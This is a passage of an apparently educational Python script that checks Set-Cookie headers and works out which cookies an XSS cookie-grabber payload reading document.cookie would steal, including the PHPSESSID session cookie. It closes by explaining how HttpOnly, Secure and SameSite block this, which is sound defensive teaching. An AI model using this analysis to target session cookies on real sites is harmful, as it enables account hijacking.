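            "sent_over_http": not bool(morsel["secure"]),        # no Secure flag
            "samesite": morsel["samesite"] or "not set",
        }
    return report


def document_cookie_view(headers):
    """What document.cookie would return in the victim's browser after
    receiving these Set-Cookie headers: every cookie except HttpOnly ones.
    This is the string the grabber's escape(document.cookie) would send."""
    visible = []
    for header in headers:
        jar = SimpleCookie()
        jar.load(header)
        for name, morsel in jar.items():
            if not morsel["httponly"]:
                visible.append(f"{name}={morsel.value}")
    return "; ".join(visible)


def grabber_gets_session(headers, session_name="PHPSESSID"):
    """True when the session cookie would end up in cookies.txt."""
    return f"{session_name}=" in document_cookie_view(headers)


if __name__ == "__main__":
    for label, header in (("weak", WEAK), ("strong", STRONG)):
        print(label, cookie_exposure(header))
        print("  grabber sees:", document_cookie_view([header, "theme=dark; Path=/"]))
```

HttpOnly closes the document.cookie channel the slide's payload uses; Secure stops the same cookie being sniffed on plain HTTP, and SameSite limits the cross-site requests of the CSRF example, so all three belong on a session cookie.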
